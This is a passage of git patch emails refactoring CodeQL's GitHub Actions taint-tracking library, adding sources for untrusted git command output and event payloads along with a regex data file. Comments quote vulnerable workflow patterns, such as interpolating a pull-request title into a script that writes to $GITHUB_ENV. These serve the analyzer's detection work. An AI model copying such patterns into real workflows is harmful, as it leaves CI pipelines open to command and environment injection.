load("@bazel_tools//tools/build_defs/repo:utils.bzl", "maybe") -_swift_prebuilt_version = "swift-5.10.1-RELEASE.323" +_swift_prebuilt_version = "swift-6.0.1-RELEASE.330" _swift_sha_map = { - "Linux-X64": "29c7c53ab2f438e85daecdb4567173c78ac32afc45753d7277d744aed515229d", - "macOS-ARM64": "e697f423c8abcb8a942246489fd4f8ce71472119510b64b2073eaeaec86b771e", - "macOS-X64": "faef29334e8615e8a71263c7453ebc7e566d6f2928d827675f6faae233c544a6", + "Linux-X64": "3da9b257b08da3bed023656c3bea2e1d0e6504b1592f593a077023c59e5339fc", + "macOS-X64": "66641b3b285e593342b88d48defa6668b15a85603acfe5aba5b62b9ed9123465", } _swift_arch_map = { From 6a99845ecf46a81ae2a27d26c0ff76afb79e2994 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Thu, 10 Oct 2024 22:22:56 +0200 Subject: [PATCH 0572/1267] Remove old code to handle redirections to GITHUB_ENV Redirections to GITHUB_ENV are better handled now by the Bash module ---- --- .../actions/dataflow/internal/DataFlowPrivate.qll | 15 --------------- 1 file changed, 15 deletions(-) diff --git a/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll b/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll index 3226e41ba2f..4e4f580f070 100644 --- a/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll +++ b/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll @@ -266,21 +266,6 @@ predicate envCtxLocalStep(Node nodeFrom, Node nodeTo) { madSource(nodeFrom, _, "env." + astTo.getFieldName()) or astTo.getTarget() = astFrom - or - // e.g: - // - run: echo ISSUE_KEY=$(echo "${{ github.event.pull_request.title }}") >> $GITHUB_ENV - // - run: echo ${{ env.ISSUE_KEY }} - exists(Run run, string script, Expression expr, string line, string key, string value | - run.getScript() = script and - run.getAnScriptExpr() = expr and - line = script.splitAt("\n") and - key = line.regexpCapture("echo\\s+([^=]+)\\s*=(.*)>>\\s*\\$GITHUB_ENV", 1) and - value = line.regexpCapture("echo\\s+([^=]+)\\s*=(.*)>>\\s*\\$GITHUB_ENV", 2) and - value.indexOf(expr.getRawExpression()) > 0 and - key = astTo.getFieldName() and - expr = astFrom and - expr.getEnclosingWorkflow() = run.getEnclosingWorkflow() - ) ) ) } From 898507eb5488325c3569ecf984163bf948ba3874 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Fri, 11 Oct 2024 12:17:35 +0200 Subject: [PATCH 0573/1267] Update publish.yml --- .github/workflows/publish.yml | 1 - 1 file changed, 1 deletion(-) diff --git a/.github/workflows/publish.yml b/.github/workflows/publish.yml index bfe87d1056c..67a428233e2 100644 --- a/.github/workflows/publish.yml +++ b/.github/workflows/publish.yml @@ -13,7 +13,6 @@ jobs: GITHUB_TOKEN: ${{ github.token }} run: | gh extension install github/gh-codeql - gh codeql set-channel "nightly" gh codeql version printf "CODEQL_FETCHED_CODEQL_PATH=" >> "${GITHUB_ENV}" gh codeql version --format=json | jq -r .unpackedLocation >> "${GITHUB_ENV}" From d4a24dfdd15d66486194380f33f1cc15af581365 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Fri, 11 Oct 2024 12:19:22 +0200 Subject: [PATCH 0574/1267] Refactor FlowSteps --- ql/lib/codeql/actions/dataflow/FlowSteps.qll | 326 +++--------------- ql/lib/codeql/actions/dataflow/TaintSteps.qll | 101 ++++++ .../dataflow/internal/DataFlowPrivate.qll | 6 +- .../internal/TaintTrackingPrivate.qll | 2 +- 4 files changed, 161 insertions(+), 274 deletions(-) create mode 100644 ql/lib/codeql/actions/dataflow/TaintSteps.qll diff --git a/ql/lib/codeql/actions/dataflow/FlowSteps.qll b/ql/lib/codeql/actions/dataflow/FlowSteps.qll index f43d1bdcd87..b0d98d2e659 100644 --- a/ql/lib/codeql/actions/dataflow/FlowSteps.qll +++ b/ql/lib/codeql/actions/dataflow/FlowSteps.qll @@ -3,120 +3,8 @@ */ private import actions -private import codeql.util.Unit private import codeql.actions.DataFlow private import codeql.actions.dataflow.FlowSources -private import codeql.actions.dataflow.ExternalFlow -private import codeql.actions.security.ArtifactPoisoningQuery -private import codeql.actions.security.OutputClobberingQuery -private import codeql.actions.security.UntrustedCheckoutQuery - -/** - * A unit class for adding additional taint steps. - * - * Extend this class to add additional taint steps that should apply to all - * taint configurations. - */ -class AdditionalTaintStep extends Unit { - /** - * Holds if the step from `node1` to `node2` should be considered a taint - * step for all configurations. - */ - abstract predicate step(DataFlow::Node node1, DataFlow::Node node2); -} - -/** - * Holds if and environment variable is used, directly or indirectly, in a Run's step expression. - * Where the expression is a string captured from the Run's script. - */ -bindingset[var_name, expr] -predicate envToRunExpr(string var_name, Run run, string expr) { - // e.g. echo "FOO=$BODY" >> $GITHUB_ENV - // e.g. echo "FOO=${BODY}" >> $GITHUB_ENV - expr.matches("%$" + ["", "{", "ENV{"] + var_name + "%") - or - // e.g. echo "FOO=$(echo $BODY)" >> $GITHUB_ENV - expr.matches("$(echo %") and expr.indexOf(var_name) > 0 - or - // e.g. - // FOO=$(echo $BODY) - // echo "FOO=$FOO" >> $GITHUB_ENV - exists(string line, string var2_name, string var2_value | run.getScript().splitAt("\n") = line | - var2_name = line.regexpCapture("([a-zA-Z0-9\\-_]+)=(.*)", 1) and - var2_value = line.regexpCapture("([a-zA-Z0-9\\-_]+)=(.*)", 2) and - var2_value.matches("%$" + ["", "{", "ENV{"] + var_name + "%") and - ( - expr.matches("%$" + ["", "{", "ENV{"] + var2_name + "%") - or - expr.matches("$(echo %") and expr.indexOf(var2_name) > 0 - ) - ) -} - -/** - * Holds if an environment variable is used, directly or indirectly, as an argument to a dangerous command - * in a Run step. - * Where the command is a string captured from the Run's script. - */ -bindingset[var_name] -predicate envToArgInjSink(string var_name, Run run, string command) { - exists(string argument, string line, string regexp, int command_group, int argument_group | - run.getScript().splitAt("\n") = line and - argumentInjectionSinksDataModel(regexp, command_group, argument_group) and - argument = line.regexpCapture(regexp, argument_group) and - command = line.regexpCapture(regexp, command_group) and - envToRunExpr(var_name, run, argument) and - exists(run.getInScopeEnvVarExpr(var_name)) - ) -} - -/** - * Holds if an env var is passed to a Run step and this Run step, writes its value to a special workflow file. - * - file is the name of the special workflow file: GITHUB_ENV, GITHUB_OUTPUT, GITHUB_PATH - * - var_name is the name of the env var - * - run is the Run step - * - key is the name assigned in the special workflow file. - * e.g. FOO for `echo "FOO=$BODY" >> $GITHUB_ENV` - * e.g. FOO for `echo "FOO=$(echo $BODY)" >> $GITHUB_OUTPUT` - * e.g. path (special name) for `echo "$BODY" >> $GITHUB_PATH` - */ -bindingset[var_name] -predicate envToSpecialFile(string file, string var_name, Run run, string key) { - exists(string value | - ( - file = "GITHUB_ENV" and - run.getAWriteToGitHubEnv(key, value) - or - file = "GITHUB_OUTPUT" and - run.getAWriteToGitHubOutput(key, value) - or - file = "GITHUB_PATH" and - run.getAWriteToGitHubPath(value) and - key = "path" - ) and - envToRunExpr(var_name, run, value) - ) -} - -/** - * Holds if a Run step declares an environment variable, uses it in its script to set another env var. - * e.g. - * env: - * BODY: ${{ github.event.comment.body }} - * run: | - * echo "foo=$(echo $BODY)" >> $GITHUB_ENV - */ -predicate envToRunStep(DataFlow::Node pred, DataFlow::Node succ) { - exists(Run run, string var_name | - run.getInScopeEnvVarExpr(var_name) = pred.asExpr() and - succ.asExpr() = run.getScriptScalar() and - ( - envToSpecialFile(["GITHUB_ENV", "GITHUB_OUTPUT", "GITHUB_PATH"], var_name, run, _) or - envToArgInjSink(var_name, run, _) or - exists(OutputClobberingSink n | n.asExpr() = run.getScriptScalar()) - ) - ) -} /** * Holds if a Run step declares an environment variable, uses it in its script and sets an output in its script. @@ -132,37 +20,61 @@ predicate envToRunStep(DataFlow::Node pred, DataFlow::Node succ) { * echo "::set-output name=step-output::$BODY" */ predicate envToOutputStoreStep(DataFlow::Node pred, DataFlow::Node succ, DataFlow::ContentSet c) { - exists(Run run, string var_name, string key | - run.getInScopeEnvVarExpr(var_name) = pred.asExpr() and + exists(Run run, string var, string field | + run.getInScopeEnvVarExpr(var) = pred.asExpr() and succ.asExpr() = run and - envToSpecialFile("GITHUB_OUTPUT", var_name, run, key) and - c = any(DataFlow::FieldContent ct | ct.getName() = key) + Bash::envReachingGitHubFileWrite(run, var, "GITHUB_OUTPUT", field) and + c = any(DataFlow::FieldContent ct | ct.getName() = field) ) } predicate envToEnvStoreStep(DataFlow::Node pred, DataFlow::Node succ, DataFlow::ContentSet c) { - exists(Run run, string var_name, string key, string value | - run.getAWriteToGitHubEnv(key, value) and - c = any(DataFlow::FieldContent ct | ct.getName() = key) and - pred.asExpr() = run.getInScopeEnvVarExpr(var_name) and + exists( + Run run, string var, string field //string key, string value | + | + run.getInScopeEnvVarExpr(var) = pred.asExpr() and // we store the taint on the enclosing job since the may not exist an implicit env attribute succ.asExpr() = run.getEnclosingJob() and - Bash::isBashParameterExpansion(value, var_name, _, _) + Bash::envReachingGitHubFileWrite(run, var, "GITHUB_ENV", field) and + c = any(DataFlow::FieldContent ct | ct.getName() = field) //and ) } -predicate controlledCWD(Step artifact) { - artifact instanceof UntrustedArtifactDownloadStep or - // This shoould be: - // artifact instanceof PRHeadCheckoutStep - // but PRHeadCheckoutStep uses Taint Tracking anc causes a non-Monolitic Recursion error - // so we list all the subclasses of PRHeadCheckoutStep here and use actions/checkout as a workaround - // instead of using ActionsMutableRefCheckout and ActionsSHACheckout - artifact.(Uses).getCallee() = "actions/checkout" or - artifact instanceof GitMutableRefCheckout or - artifact instanceof GitSHACheckout or - artifact instanceof GhMutableRefCheckout or - artifact instanceof GhSHACheckout +/** + * A command whose output gets assigned to an environment variable or step output. + * - run: | + * echo "foo=$(cmd)" >> "$GITHUB_OUTPUT" + * - run: | + * foo=$(> "$GITHUB_OUTPUT" + */ +predicate commandToOutputStoreStep(DataFlow::Node pred, DataFlow::Node succ, DataFlow::ContentSet c) { + exists(CommandSource source, Run run, string key, string cmd | + source.getCommand() = cmd and + Bash::cmdReachingGitHubFileWrite(run, cmd, "GITHUB_OUTPUT", key) and + c = any(DataFlow::FieldContent ct | ct.getName() = key) and + pred.asExpr() = run.getScriptScalar() and + succ.asExpr() = run + ) +} + +/** + * A command whose output gets assigned to an environment variable or step output. + * - run: | + * echo "foo=$(cmd)" >> "$GITHUB_ENV" + * - run: | + * foo=$(> "$GITHUB_ENV" + */ +predicate commandToEnvStoreStep(DataFlow::Node pred, DataFlow::Node succ, DataFlow::ContentSet c) { + exists(CommandSource source, Run run, string key, string cmd | + source.getCommand() = cmd and + Bash::cmdReachingGitHubFileWrite(run, cmd, "GITHUB_ENV", key) and + c = any(DataFlow::FieldContent ct | ct.getName() = key) and + pred.asExpr() = run.getScriptScalar() and + // we store the taint on the enclosing job since there may not be an implicit env attribute + succ.asExpr() = run.getEnclosingJob() + ) } /** @@ -173,28 +85,12 @@ predicate controlledCWD(Step artifact) { * foo=$(> "$GITHUB_ENV" */ -predicate artifactToEnvStoreStep(DataFlow::Node pred, DataFlow::Node succ, DataFlow::ContentSet c) { - exists(Run run, string key, string value, Step artifact | - controlledCWD(artifact) and - ( - // A file is read and its content is assigned to an env var - // - run: | - // foo=$(> "$GITHUB_ENV" - exists(string var_name, string file_read | - run.getAnAssignment(var_name, file_read) and - Bash::outputsPartialFileContent(run, file_read) and - envToRunExpr(var_name, run, value) and - run.getAWriteToGitHubEnv(key, value) - ) - or - // A file is read and its content is assigned to an output - // - run: echo "foo=$(> "$GITHUB_ENV" - run.getAWriteToGitHubEnv(key, value) and - Bash::outputsPartialFileContent(run, value) - ) and +predicate fileToEnvStoreStep(DataFlow::Node pred, DataFlow::Node succ, DataFlow::ContentSet c) { + exists(FileSource source, Run run, string key, string cmd | + source.asExpr().(Step).getAFollowingStep() = run and + Bash::cmdReachingGitHubFileWrite(run, cmd, "GITHUB_ENV", key) and + Bash::outputsPartialFileContent(run, cmd) and c = any(DataFlow::FieldContent ct | ct.getName() = key) and - artifact.getAFollowingStep() = run and pred.asExpr() = run.getScriptScalar() and // we store the taint on the enclosing job since there may not be an implicit env attribute succ.asExpr() = run.getEnclosingJob() ) } - -/** - * A download artifact step followed by a step that may use downloaded artifacts. - */ -predicate artifactDownloadToRunStep(DataFlow::Node pred, DataFlow::Node succ) { - exists(Step artifact, Run run | - controlledCWD(artifact) and - pred.asExpr() = artifact and - succ.asExpr() = run.getScriptScalar() and - artifact.getAFollowingStep() = run - ) -} - -// -/** - * A download artifact step followed by a uses step . - */ -predicate artifactDownloadToUsesStep(DataFlow::Node pred, DataFlow::Node succ) { - exists(Step artifact, Uses uses | - controlledCWD(artifact) and - pred.asExpr() = artifact and - succ.asExpr() = uses and - artifact.getAFollowingStep() = uses - ) -} - -/** - * A read of the _files field of the dorny/paths-filter action. - */ -predicate dornyPathsFilterTaintStep(DataFlow::Node pred, DataFlow::Node succ) { - exists(StepsExpression o | - pred instanceof DornyPathsFilterSource and - o.getStepId() = pred.asExpr().(UsesStep).getId() and - o.getFieldName().matches("%_files") and - succ.asExpr() = o - ) -} - -/** - * A read of user-controlled field of the tj-actions/changed-files action. - */ -predicate tjActionsChangedFilesTaintStep(DataFlow::Node pred, DataFlow::Node succ) { - exists(StepsExpression o | - pred instanceof TJActionsChangedFilesSource and - o.getTarget() = pred.asExpr() and - o.getStepId() = pred.asExpr().(UsesStep).getId() and - o.getFieldName() = - [ - "added_files", "copied_files", "deleted_files", "modified_files", "renamed_files", - "all_old_new_renamed_files", "type_changed_files", "unmerged_files", "unknown_files", - "all_changed_and_modified_files", "all_changed_files", "other_changed_files", - "all_modified_files", "other_modified_files", "other_deleted_files", "modified_keys", - "changed_keys" - ] and - succ.asExpr() = o - ) -} - -/** - * A read of user-controlled field of the tj-actions/verify-changed-files action. - */ -predicate tjActionsVerifyChangedFilesTaintStep(DataFlow::Node pred, DataFlow::Node succ) { - exists(StepsExpression o | - pred instanceof TJActionsVerifyChangedFilesSource and - o.getTarget() = pred.asExpr() and - o.getStepId() = pred.asExpr().(UsesStep).getId() and - o.getFieldName() = "changed_files" and - succ.asExpr() = o - ) -} - -/** - * A read of user-controlled field of the xt0rted/slash-command-action action. - */ -predicate xt0rtedSlashCommandActionTaintStep(DataFlow::Node pred, DataFlow::Node succ) { - exists(StepsExpression o | - pred instanceof Xt0rtedSlashCommandSource and - o.getTarget() = pred.asExpr() and - o.getStepId() = pred.asExpr().(UsesStep).getId() and - o.getFieldName() = "command-arguments" and - succ.asExpr() = o - ) -} - -class TaintSteps extends AdditionalTaintStep { - override predicate step(DataFlow::Node node1, DataFlow::Node node2) { - envToRunStep(node1, node2) or - artifactDownloadToRunStep(node1, node2) or - artifactDownloadToUsesStep(node1, node2) or - // 3rd party actions - dornyPathsFilterTaintStep(node1, node2) or - tjActionsChangedFilesTaintStep(node1, node2) or - tjActionsVerifyChangedFilesTaintStep(node1, node2) or - xt0rtedSlashCommandActionTaintStep(node1, node2) - } -} diff --git a/ql/lib/codeql/actions/dataflow/TaintSteps.qll b/ql/lib/codeql/actions/dataflow/TaintSteps.qll new file mode 100644 index 00000000000..de64a0dd6f4 --- /dev/null +++ b/ql/lib/codeql/actions/dataflow/TaintSteps.qll @@ -0,0 +1,101 @@ +/** + * Provides classes representing various flow steps for taint tracking. + */ + +private import actions +private import codeql.util.Unit +private import codeql.actions.DataFlow +private import codeql.actions.dataflow.FlowSources + +/** + * A unit class for adding additional taint steps. + * + * Extend this class to add additional taint steps that should apply to all + * taint configurations. + */ +class AdditionalTaintStep extends Unit { + /** + * Holds if the step from `node1` to `node2` should be considered a taint + * step for all configurations. + */ + abstract predicate step(DataFlow::Node node1, DataFlow::Node node2); +} + +/** + * A download artifact step followed by a step that may use downloaded artifacts. + */ +predicate fileDownloadToRunStep(DataFlow::Node pred, DataFlow::Node succ) { + exists(FileSource source, Run run | + pred = source and + source.asExpr().(Step).getAFollowingStep() = run and + succ.asExpr() = run.getScriptScalar() and + Bash::outputsPartialFileContent(run, run.getACommand()) + ) +} + +/** + * A read of the _files field of the dorny/paths-filter action. + */ +predicate dornyPathsFilterTaintStep(DataFlow::Node pred, DataFlow::Node succ) { + exists(StepsExpression o | + pred instanceof DornyPathsFilterSource and + o.getStepId() = pred.asExpr().(UsesStep).getId() and + o.getFieldName().matches("%_files") and + succ.asExpr() = o + ) +} + +/** + * A read of user-controlled field of the tj-actions/changed-files action. + */ +predicate tjActionsChangedFilesTaintStep(DataFlow::Node pred, DataFlow::Node succ) { + exists(StepsExpression o | + pred instanceof TJActionsChangedFilesSource and + o.getTarget() = pred.asExpr() and + o.getStepId() = pred.asExpr().(UsesStep).getId() and + o.getFieldName() = + [ + "added_files", "copied_files", "deleted_files", "modified_files", "renamed_files", + "all_old_new_renamed_files", "type_changed_files", "unmerged_files", "unknown_files", + "all_changed_and_modified_files", "all_changed_files", "other_changed_files", + "all_modified_files", "other_modified_files", "other_deleted_files", "modified_keys", + "changed_keys" + ] and + succ.asExpr() = o + ) +} + +/** + * A read of user-controlled field of the tj-actions/verify-changed-files action. + */ +predicate tjActionsVerifyChangedFilesTaintStep(DataFlow::Node pred, DataFlow::Node succ) { + exists(StepsExpression o | + pred instanceof TJActionsVerifyChangedFilesSource and + o.getTarget() = pred.asExpr() and + o.getStepId() = pred.asExpr().(UsesStep).getId() and + o.getFieldName() = "changed_files" and + succ.asExpr() = o + ) +} + +/** + * A read of user-controlled field of the xt0rted/slash-command-action action. + */ +predicate xt0rtedSlashCommandActionTaintStep(DataFlow::Node pred, DataFlow::Node succ) { + exists(StepsExpression o | + pred instanceof Xt0rtedSlashCommandSource and + o.getTarget() = pred.asExpr() and + o.getStepId() = pred.asExpr().(UsesStep).getId() and + o.getFieldName() = "command-arguments" and + succ.asExpr() = o + ) +} + +class TaintSteps extends AdditionalTaintStep { + override predicate step(DataFlow::Node node1, DataFlow::Node node2) { + dornyPathsFilterTaintStep(node1, node2) or + tjActionsChangedFilesTaintStep(node1, node2) or + tjActionsVerifyChangedFilesTaintStep(node1, node2) or + xt0rtedSlashCommandActionTaintStep(node1, node2) + } +} diff --git a/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll b/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll index 4e4f580f070..d7c3dad9ee7 100644 --- a/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll +++ b/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll @@ -351,8 +351,10 @@ predicate storeStep(Node node1, ContentSet c, Node node2) { madStoreStep(node1, node2, c) or envToOutputStoreStep(node1, node2, c) or envToEnvStoreStep(node1, node2, c) or - artifactToOutputStoreStep(node1, node2, c) or - artifactToEnvStoreStep(node1, node2, c) + fileToOutputStoreStep(node1, node2, c) or + fileToEnvStoreStep(node1, node2, c) or + commandToOutputStoreStep(node1, node2, c) or + commandToEnvStoreStep(node1, node2, c) } /** diff --git a/ql/lib/codeql/actions/dataflow/internal/TaintTrackingPrivate.qll b/ql/lib/codeql/actions/dataflow/internal/TaintTrackingPrivate.qll index b8647339d24..2dde5203576 100644 --- a/ql/lib/codeql/actions/dataflow/internal/TaintTrackingPrivate.qll +++ b/ql/lib/codeql/actions/dataflow/internal/TaintTrackingPrivate.qll @@ -5,7 +5,7 @@ private import DataFlowPrivate private import codeql.actions.DataFlow -private import codeql.actions.dataflow.FlowSteps +private import codeql.actions.dataflow.TaintSteps private import codeql.actions.Ast /** From d558ff80c3a63fa113a0befa2d09334c48d8e64f Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Fri, 11 Oct 2024 12:20:03 +0200 Subject: [PATCH 0575/1267] New Command sources for git and GITHUB_EVENT_PATH --- ql/lib/codeql/actions/config/Config.qll | 10 ++ .../actions/config/ConfigExtensions.qll | 5 + .../codeql/actions/dataflow/FlowSources.qll | 109 +++++++++++++++++- ql/lib/ext/config/untrusted_git_commands.yml | 32 +++++ 4 files changed, 153 insertions(+), 3 deletions(-) create mode 100644 ql/lib/ext/config/untrusted_git_commands.yml diff --git a/ql/lib/codeql/actions/config/Config.qll b/ql/lib/codeql/actions/config/Config.qll index e298865c468..e3bf239565e 100644 --- a/ql/lib/codeql/actions/config/Config.qll +++ b/ql/lib/codeql/actions/config/Config.qll @@ -128,3 +128,13 @@ predicate vulnerableActionsDataModel( ) { Extensions::vulnerableActionsDataModel(action, vulnerable_version, vulnerable_sha, fixed_version) } + +/** + * MaD models for untrusted git commands + * Fields: + * - cmd_regex: Regular expression for matching untrusted git commands + * - flag: Flag for the command + */ +predicate untrustedGitCommandsDataModel(string cmd_regex, string flag) { + Extensions::untrustedGitCommandsDataModel(cmd_regex, flag) +} diff --git a/ql/lib/codeql/actions/config/ConfigExtensions.qll b/ql/lib/codeql/actions/config/ConfigExtensions.qll index cc1b5553f5f..a32e9c445f2 100644 --- a/ql/lib/codeql/actions/config/ConfigExtensions.qll +++ b/ql/lib/codeql/actions/config/ConfigExtensions.qll @@ -57,3 +57,8 @@ extensible predicate argumentInjectionSinksDataModel( extensible predicate vulnerableActionsDataModel( string action, string vulnerable_version, string vulnerable_sha, string fixed_version ); + +/** + * Holds for git commands that may introduce untrusted data when called on an attacker controlled branch. + */ +extensible predicate untrustedGitCommandsDataModel(string cmd_regex, string flag); diff --git a/ql/lib/codeql/actions/dataflow/FlowSources.qll b/ql/lib/codeql/actions/dataflow/FlowSources.qll index 4682e7b1abf..f1fb2073ed0 100644 --- a/ql/lib/codeql/actions/dataflow/FlowSources.qll +++ b/ql/lib/codeql/actions/dataflow/FlowSources.qll @@ -64,6 +64,88 @@ class GitHubEventCtxSource extends RemoteFlowSource { override string getSourceType() { result = flag } } +abstract class CommandSource extends RemoteFlowSource { + abstract string getCommand(); + + abstract Run getEnclosingRun(); +} + +class GitCommandSource extends RemoteFlowSource, CommandSource { + Run run; + string cmd; + string flag; + + GitCommandSource() { + exists(Step checkout, string cmd_regex | + // This shoould be: + // source instanceof PRHeadCheckoutStep + // but PRHeadCheckoutStep uses Taint Tracking anc causes a non-Monolitic Recursion error + // so we list all the subclasses of PRHeadCheckoutStep here and use actions/checkout as a workaround + // instead of using ActionsMutableRefCheckout and ActionsSHACheckout + ( + exists(Uses uses | + checkout = uses and + uses.getCallee() = "actions/checkout" and + exists(uses.getArgument("ref")) + ) + or + checkout instanceof GitMutableRefCheckout + or + checkout instanceof GitSHACheckout + or + checkout instanceof GhMutableRefCheckout + or + checkout instanceof GhSHACheckout + ) and + this.asExpr() = run.getScriptScalar() and + checkout.getAFollowingStep() = run and + run.getACommand() = cmd and + cmd.indexOf("git") = 0 and + untrustedGitCommandsDataModel(cmd_regex, flag) and + cmd.regexpMatch(cmd_regex) + ) + } + + override string getSourceType() { result = flag } + + override string getCommand() { result = cmd } + + override Run getEnclosingRun() { result = run } +} + +class GitHubEventPathSource extends RemoteFlowSource, CommandSource { + string cmd; + string flag; + string access_path; + Run run; + + // Examples + // COMMENT_AUTHOR=$(jq -r .comment.user.login "$GITHUB_EVENT_PATH") + // CURRENT_COMMENT=$(jq -r .comment.body "$GITHUB_EVENT_PATH") + // PR_HEAD=$(jq --raw-output .pull_request.head.ref ${GITHUB_EVENT_PATH}) + // PR_NUMBER=$(jq --raw-output .pull_request.number ${GITHUB_EVENT_PATH}) + // PR_TITLE=$(jq --raw-output .pull_request.title ${GITHUB_EVENT_PATH}) + // BODY=$(jq -r '.issue.body' "$GITHUB_EVENT_PATH" | sed -n '3p') + GitHubEventPathSource() { + this.asExpr() = run.getScriptScalar() and + run.getACommand() = cmd and + cmd.matches("jq%") and + cmd.matches("%GITHUB_EVENT_PATH%") and + exists(string regexp | + untrustedEventPropertiesDataModel(regexp, flag) and + not flag = "json" and + access_path = "github.event" + cmd.regexpCapture(".*\\s+([^\\s]+)\\s+.*", 1) and + normalizeExpr(access_path).regexpMatch("(?i)\\s*" + wrapRegexp(regexp) + ".*") + ) + } + + override string getSourceType() { result = flag } + + override string getCommand() { result = cmd } + + override Run getEnclosingRun() { result = run } +} + class GitHubEventJsonSource extends RemoteFlowSource { string flag; @@ -104,10 +186,12 @@ class MaDSource extends RemoteFlowSource { override string getSourceType() { result = sourceType } } +abstract class FileSource extends RemoteFlowSource { } + /** * A downloaded artifact. */ -class ArtifactSource extends RemoteFlowSource { +class ArtifactSource extends RemoteFlowSource, FileSource { ArtifactSource() { this.asExpr() instanceof UntrustedArtifactDownloadStep } override string getSourceType() { result = "artifact" } @@ -116,8 +200,27 @@ class ArtifactSource extends RemoteFlowSource { /** * A file from an untrusted checkout. */ -private class CheckoutSource extends RemoteFlowSource { - CheckoutSource() { this.asExpr() instanceof PRHeadCheckoutStep } +private class CheckoutSource extends RemoteFlowSource, FileSource { + CheckoutSource() { + // This shoould be: + // source instanceof PRHeadCheckoutStep + // but PRHeadCheckoutStep uses Taint Tracking anc causes a non-Monolitic Recursion error + // so we list all the subclasses of PRHeadCheckoutStep here and use actions/checkout as a workaround + // instead of using ActionsMutableRefCheckout and ActionsSHACheckout + exists(Uses u | + this.asExpr() = u and + u.getCallee() = "actions/checkout" and + exists(u.getArgument("ref")) + ) + or + this.asExpr() instanceof GitMutableRefCheckout + or + this.asExpr() instanceof GitSHACheckout + or + this.asExpr() instanceof GhMutableRefCheckout + or + this.asExpr() instanceof GhSHACheckout + } override string getSourceType() { result = "artifact" } } diff --git a/ql/lib/ext/config/untrusted_git_commands.yml b/ql/lib/ext/config/untrusted_git_commands.yml new file mode 100644 index 00000000000..0d6c9e3bfa0 --- /dev/null +++ b/ql/lib/ext/config/untrusted_git_commands.yml @@ -0,0 +1,32 @@ +extensions: + - addsTo: + pack: github/actions-all + extensible: untrustedGitCommandsDataModel + data: + # FILES=$(git diff-tree --no-commit-id --name-only HEAD -r) + - [".*git\\b.*\\bdiff-tree\\b.*", "filename,multiline"] + # CHANGES=$(git --no-pager diff --name-only $NAME | grep -v -f .droneignore); + # CHANGES=$(git diff --name-only) + - [".*git\\b.*\\bdiff\\b.*", "filename,multiline"] + # COMMIT_MESSAGE=$(git log --format=%s -n 1) + - [".*git\\b.*\\blog\\b.*%s.*", "text,online"] + # COMMIT_MESSAGE=$(git log --format=%B -n 1) + - [".*git\\b.*\\blog\\b.*%B.*", "text,multiline"] + # COMMIT_MESSAGE=$(git log --format=oneline) + - [".*git\\b.*\\blog\\b.*oneline.*", "text,oneline"] + # COMMIT_MESSAGE=$(git show -s --format=%B) + # COMMIT_MESSAGE=$(git show -s --format=%s) + - [".*git\\b.*\\bshow\\b.*-s.*%s.*", "text,oneline"] + - [".*git\\b.*\\bshow\\b.*-s.*%B.*", "text,multiline"] + # AUTHOR=$(git log -1 --pretty=format:'%an') + - [".*git\\b.*\\blog\\b.*%an.*", "username,oneline"] + # AUTHOR=$(git show -s --pretty=%an) + - [".*git\\b.*\\bshow\\b.*%an.*", "username,oneline"] + # EMAIL=$(git log -1 --pretty=format:'%ae') + - [".*git\\b.*\\blog\\b.*%ae.*", "email,oneline"] + # EMAIL=$(git show -s --pretty=%ae) + - [".*git\\b.*\\bshow\\b.*%ae.*", "email,oneline"] + # BRANCH=$(git branch --show-current) + - [".*git\\b.*\\bbranch\\b.*\\b--show-current\\b.*", "branch,oneline"] + # BRANCH=$(git rev-parse --abbrev-ref HEAD) + - [".*git\\b.*\\brev-parse\\b.*\\b--abbrev-ref\\b.*", "branch,oneline"] From ee25f3565335dd4ee4e62188721adebb76a97b87 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Fri, 11 Oct 2024 12:20:26 +0200 Subject: [PATCH 0576/1267] Refactor of Bash functions --- ql/lib/codeql/actions/Ast.qll | 16 + ql/lib/codeql/actions/Bash.qll | 364 ++++++++++++++++++ ql/lib/codeql/actions/Helper.qll | 239 +----------- ql/lib/codeql/actions/ast/internal/Ast.qll | 16 + .../security/ArgumentInjectionQuery.qll | 58 ++- .../security/ArtifactPoisoningQuery.qll | 18 + .../actions/security/CodeInjectionQuery.qll | 16 + .../security/EnvPathInjectionQuery.qll | 72 ++-- .../actions/security/EnvVarInjectionQuery.qll | 77 ++-- .../security/OutputClobberingQuery.qll | 134 ++++--- .../actions/security/PoisonableSteps.qll | 11 +- .../security/UntrustedCheckoutQuery.qll | 22 +- 12 files changed, 697 insertions(+), 346 deletions(-) create mode 100644 ql/lib/codeql/actions/Bash.qll diff --git a/ql/lib/codeql/actions/Ast.qll b/ql/lib/codeql/actions/Ast.qll index 759bcf3f786..cc29ceffe53 100644 --- a/ql/lib/codeql/actions/Ast.qll +++ b/ql/lib/codeql/actions/Ast.qll @@ -315,6 +315,22 @@ class Run extends Step instanceof RunImpl { } predicate getAWriteToGitHubPath(string value) { super.getAWriteToGitHubPath(value) } + + predicate getAnEnvReachingGitHubOutputWrite(string var, string output_field) { + super.getAnEnvReachingGitHubOutputWrite(var, output_field) + } + + predicate getACmdReachingGitHubOutputWrite(string cmd, string output_field) { + super.getACmdReachingGitHubOutputWrite(cmd, output_field) + } + + predicate getAnEnvReachingGitHubEnvWrite(string var, string output_field) { + super.getAnEnvReachingGitHubEnvWrite(var, output_field) + } + + predicate getACmdReachingGitHubEnvWrite(string cmd, string output_field) { + super.getACmdReachingGitHubEnvWrite(cmd, output_field) + } } abstract class SimpleReferenceExpression extends AstNode instanceof SimpleReferenceExpressionImpl { diff --git a/ql/lib/codeql/actions/Bash.qll b/ql/lib/codeql/actions/Bash.qll new file mode 100644 index 00000000000..5907b601a46 --- /dev/null +++ b/ql/lib/codeql/actions/Bash.qll @@ -0,0 